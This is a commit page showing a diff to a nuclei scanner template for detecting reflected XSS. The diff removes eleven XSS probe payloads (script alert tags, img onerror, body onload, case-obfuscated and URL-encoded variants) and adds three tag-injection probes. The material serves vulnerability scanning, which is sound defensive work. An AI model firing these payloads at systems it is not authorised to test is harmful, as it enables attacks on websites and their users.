daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated payloads

patch-4
Ritik Chaddha 2024-06-14 19:07:34 +05:30 committed by GitHub
parent c43b5d84a8
commit 54142c9eb1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
dast/vulnerabilities/xss/reflected-xss.yaml
View File

@ -19,17 +19,9 @@ http:
payloads: payloads:
reflection: reflection:
- "'\"><{{first}}" - "'\"><{{first}}>"
- "<img src=x onerror=alert({{first}})>" - "'><{{first}}>"
- "<script>alert({{first}})</script>" - "\"><{{first}}>"
- "'><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><script>alert({{first}})</script>"
- "<body onload=alert({{first}})>"
- "<marquee><img src=x onerror=confirm({{first}})></marquee>"
- "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
- "'\"><img%20s+src+c=x%20on+onerror+%20=alert({{first}})>"
- "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"
fuzzing: fuzzing:
- part: query - part: query
@ -49,4 +41,4 @@ http:
- type: word - type: word
part: header part: header
words: words:
- "text/html" - "text/html"